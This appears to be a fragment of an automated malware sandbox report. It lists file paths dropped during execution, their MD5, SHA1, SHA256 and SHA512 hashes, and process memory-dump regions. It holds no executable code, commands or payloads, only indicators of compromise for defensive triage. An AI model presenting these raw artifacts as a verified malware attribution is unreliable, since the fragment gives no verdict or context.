| SHA256 | ee6e201490ad62b76126e8ac505b524dfaa1a84f95e69a15638f5e868637101d |
| SHA512 | c75128b9ae12129ab05e616cc3f57da66eaff1d1513d9d8efc163bd17b531bdc7ca2ecbd3255d9d7ac4d58b784117474a9e8ee7f9dff73d33345d9be7579bf18 |
C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt
| MD5 | a43144af0795d03343f43e5ddb4d0c08 |
| SHA1 | 4375286a3bee1476b2e088fd49a1c7ad6fb81f07 |
| SHA256 | d3a5f44858e125f2e25444faf014f354318ac8b6a697c82a8b02d72dab4185d3 |
| SHA512 | 8bbc5f40c35aa2ee157d4ec52c9ad76d58a9434650e801c90b08b0ef0a046db23a5cdc6f1d640c11edb65baac4300491509ec850dc9260f74612d4a8b6c79ab3 |
C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt
| MD5 | 6d3b3d25a64ba16d9f84e9189c0dd54c |
| SHA1 | 69f62e418510c9bb03d61a57b17b622ae1a58483 |
| SHA256 | 7d69df7791ff9c20418aaf939d3caee005bcb34278e86f34a4bbb683e206a476 |
| SHA512 | 30752727930d0cc6754b0c234e8ab12f44401527b06b749f8f901b211f8a140f0cd49a9baaabcb61d230ced62df02c49b5075c6dc7c6cc0ec5523203e82709bb |
C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt
| MD5 | 5fa80a0193e7241a3f1a1792965389a4 |
| SHA1 | 244daa82a2298b181bfbcdf3c13915ea96dfafcb |
| SHA256 | 65a0b8d41a62b343fc2bae360e439fd1a5d8beeff3d8a5113ead8fa70bb18828 |
| SHA512 | 7c156d2e9ebdd32b4bdaf996dc457a8e7507863fa9b3101537053f83849d34e3335b6e86887822bdfb254eb8a79ed860955c2f5a32b994ed90f3b9742959f461 |
C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt
| MD5 | 76afd47a058f64a36fd3fc3fa8d42861 |
| SHA1 | 89f3de4e12c7a21460321403a06369bf4353215b |
| SHA256 | 7737a78095f3719c5b04bc0e7ad43e9ce4ccc81a6bfb0e19805e3e4c30937285 |
| SHA512 | 8866d01464f31db85beb445eabf98df3a73ba8260bafd5c35b1d2c1855a835b144da8ea778b434bcb28c3d43e9339922e982a093eabd9b72e985b90e350a4f1c |
C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt
| MD5 | ef9b0d1f2b2713b683d77493108a6f08 |
| SHA1 | 124933eb36c8e39dce55581347c7a23cc4fafe3a |
| SHA256 | 2731f761a38af729ab2184c73aa59507665308b3fd7e8b05090e6c2678283c8f |
| SHA512 | 9c653ff7debc32f416a21cc55f9dcb9a342af87b4c1c7b9464ac7f2813bd55fa58f0dff6c79806b2c7f7ec796279b74037d2107cacaf1ef4eb1f07fee6d73d75 |
C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt
| MD5 | 932bb90d0770b73ad24dda9174ced743 |
| SHA1 | f2d7323b5d3f2978fb30f7b9b026497d968dac13 |
| SHA256 | 549edc4d8c1f25c916f19b68f412ca4957d6191503dfce38c96f49b2a1d3d37b |
| SHA512 | c7846774f118add3458fced652bc94d3527342415c10dc1a731413e6d94b22fbc3115d5eda4236523a221f450586dbedf29f7751a9e8e2655861f21d0653f3d1 |
C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt
| MD5 | faad7bea993e46e2b93131dc5960cd02 |
| SHA1 | 15b1a22cd47fd97d7de73275a628d81701a08fd4 |
| SHA256 | 208c825c646d1cf301fd03495601599ad7937f2ff14c9172f361ac9ffc15ec1c |
| SHA512 | c4d59712b52f7731692d78991a9d206c9bfac628eedbfd38ec05e0d055d09918580f1ccfbaaf98f2af6e81f2e4ced626d309fa2d3fb6b3cc832533674f0652d5 |
C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt
| MD5 | 161ff62ce2710bf06c99035ae4493e0f |
| SHA1 | 76beb1725177edccce02ca2e9d7a1ebeacd2d99c |
| SHA256 | d302e208e205fd7b08bd0844e787f15dec1fecd4f6e6056104a64f1105e32e4d |
| SHA512 | 135228bbf7cea08b76bc288335e1699828a642cd6b81761bba33ed5a40c28632b25cf8f8664fbf4ee2d21b573d1cda066614250054002c8bf4bda869389d03a6 |
memory/4612-322-0x00007FFD774B3000-0x00007FFD774B5000-memory.dmp
memory/4612-323-0x0000020054C00000-0x0000020054C22000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kumzcvv2.0vw.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4612-333-0x00007FFD774B0000-0x00007FFD77F71000-memory.dmp
memory/4612-334-0x00007FFD774B0000-0x00007FFD77F71000-memory.dmp
memory/4612-335-0x00007FFD774B0000-0x00007FFD77F71000-memory.dmp
memory/3632-338-0x000000007531E000-0x000000007531F000-memory.dmp
memory/3632-339-0x00000000051E0000-0x0000000005216000-memory.dmp
memory/3632-340-0x0000000075310000-0x0000000075AC0000-memory.dmp
memory/3632-341-0x0000000075310000-0x0000000075AC0000-memory.dmp
memory/3632-342-0x00000000059B0000-0x0000000005FD8000-memory.dmp
memory/3632-343-0x0000000005800000-0x0000000005822000-memory.dmp
memory/3632-344-0x0000000005FE0000-0x0000000006046000-memory.dmp
memory/3632-345-0x0000000006160000-0x00000000061C6000-memory.dmp
memory/3632-351-0x00000000061D0000-0x0000000006524000-memory.dmp
memory/4612-356-0x00007FFD774B3000-0x00007FFD774B5000-memory.dmp
memory/4612-357-0x00007FFD774B0000-0x00007FFD77F71000-memory.dmp
memory/3632-358-0x0000000006700000-0x000000000671E000-memory.dmp
memory/3632-359-0x00000000067D0000-0x000000000681C000-memory.dmp
memory/4612-360-0x00007FFD774B0000-0x00007FFD77F71000-memory.dmp
memory/3632-361-0x0000000008220000-0x000000000889A000-memory.dmp
memory/3632-362-0x0000000006B90000-0x0000000006BAA000-memory.dmp
memory/3632-363-0x0000000007BA0000-0x0000000007C36000-memory.dmp
memory/3632-364-0x00000000078B0000-0x00000000078D2000-memory.dmp
memory/3632-365-0x00000000088A0000-0x0000000008E44000-memory.dmp
C:\Users\Admin\AppData\Roaming\Scrouge.Swi
| MD5 | be60fe46432e08e827aeefd9f72d5790 |
| SHA1 | 7322ebc77810e84976136174258dddde78a23f27 |
| SHA256 | 8722cb6fe1e75ddcd9127b92f438e2b0155eab29cc29270ca7aa35be9edff7b4 |
| SHA512 | 72a7e93c1c1d78260ec1ac1438450baf4d6f21a1299824878e405a115c8318796d7bf233db80d42f8d66ab1c73531741965fbf1e9679a1fb2071bab9d8b9e913 |
memory/3632-367-0x000000007531E000-0x000000007531F000-memory.dmp
memory/3632-368-0x0000000075310000-0x0000000075AC0000-memory.dmp
memory/3632-369-0x0000000008E50000-0x000000000EAA9000-memory.dmp
memory/3632-371-0x0000000075310000-0x0000000075AC0000-memory.dmp
memory/3632-385-0x0000000075310000-0x0000000075AC0000-memory.dmp
memory/2992-384-0x0000000000FF0000-0x0000000002244000-memory.dmp
memory/2992-386-0x0000000000FF0000-0x0000000001032000-memory.dmp
memory/4612-389-0x00007FFD774B0000-0x00007FFD77F71000-memory.dmp
memory/2992-391-0x0000000025920000-0x0000000025970000-memory.dmp
memory/2992-392-0x0000000025FF0000-0x0000000026082000-memory.dmp
memory/2992-393-0x0000000025970000-0x000000002597A000-memory.dmp